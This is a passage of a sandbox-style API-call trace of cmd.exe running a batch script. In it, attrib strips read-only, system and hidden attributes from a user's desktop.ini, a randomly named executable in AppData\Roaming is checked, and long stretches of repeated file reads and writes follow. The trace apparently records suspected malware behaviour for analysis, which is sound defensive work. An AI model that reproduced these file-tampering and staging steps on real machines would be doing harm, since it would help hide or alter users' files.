_String2="type") returned -2 [0217.943] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0217.946] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0217.946] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0217.946] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0217.946] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0217.946] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0217.946] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0218.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.007] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.012] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.013] FindClose (in: hFindFile=0x2124e8 | out: hFindFile=0x2124e8) returned 1 [0218.013] FindClose (in: hFindFile=0x2124e8 | out: hFindFile=0x2124e8) returned 1 [0218.013] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0218.014] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0218.014] GetConsoleTitleW (in: lpConsoleTitle=0x16f410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.014] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f298, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f360 | out: lpAttributeList=0x16f298, lpSize=0x16f360) returned 1 [0218.014] UpdateProcThreadAttribute (in: lpAttributeList=0x16f298, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f358, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f298, lpPreviousValue=0x0) returned 1 [0218.014] GetStartupInfoW (in: lpStartupInfo=0x16f254 | out: lpStartupInfo=0x16f254*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0218.014] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.015] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f2f4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f340 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessInformation=0x16f340*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa20, dwThreadId=0x64)) returned 1 [0218.029] CloseHandle (hObject=0x4c) returned 1 [0218.029] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.029] GetEnvironmentStringsW () returned 0x210838* [0218.029] FreeEnvironmentStringsW (penv=0x210838) returned 1 [0218.029] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0218.153] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f234 | out: lpExitCode=0x16f234*=0x0) returned 1 [0218.153] CloseHandle (hObject=0x50) returned 1 [0218.153] _vsnwprintf (in: _Buffer=0x16f37c, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f240 | out: _Buffer="00000000") returned 8 [0218.153] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.153] GetEnvironmentStringsW () returned 0x212558* [0218.153] FreeEnvironmentStringsW (penv=0x212558) returned 1 [0218.153] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.153] GetEnvironmentStringsW () returned 0x212558* [0218.153] FreeEnvironmentStringsW (penv=0x212558) returned 1 [0218.153] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f298 | out: lpAttributeList=0x16f298) [0218.153] GetConsoleTitleW (in: lpConsoleTitle=0x16f618, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.154] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini")) returned 0x20 [0218.154] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x11 [0218.154] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0218.154] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0218.154] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini")) returned 0x20 [0218.154] FindNextFileW (in: hFindFile=0x212c78, lpFindFileData=0x2135e4 | out: lpFindFileData=0x2135e4) returned 0 [0218.155] GetLastError () returned 0x12 [0218.155] FindClose (in: hFindFile=0x212c78 | out: hFindFile=0x212c78) returned 1 [0218.156] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0218.156] GetConsoleTitleW (in: lpConsoleTitle=0x16f5b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.156] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0218.156] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.156] GetFileType (hFile=0x50) returned 0x1 [0218.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.157] GetFileType (hFile=0x50) returned 0x1 [0218.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.157] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.158] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.159] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.160] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.160] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.161] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.161] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.162] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.162] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.163] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.163] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, 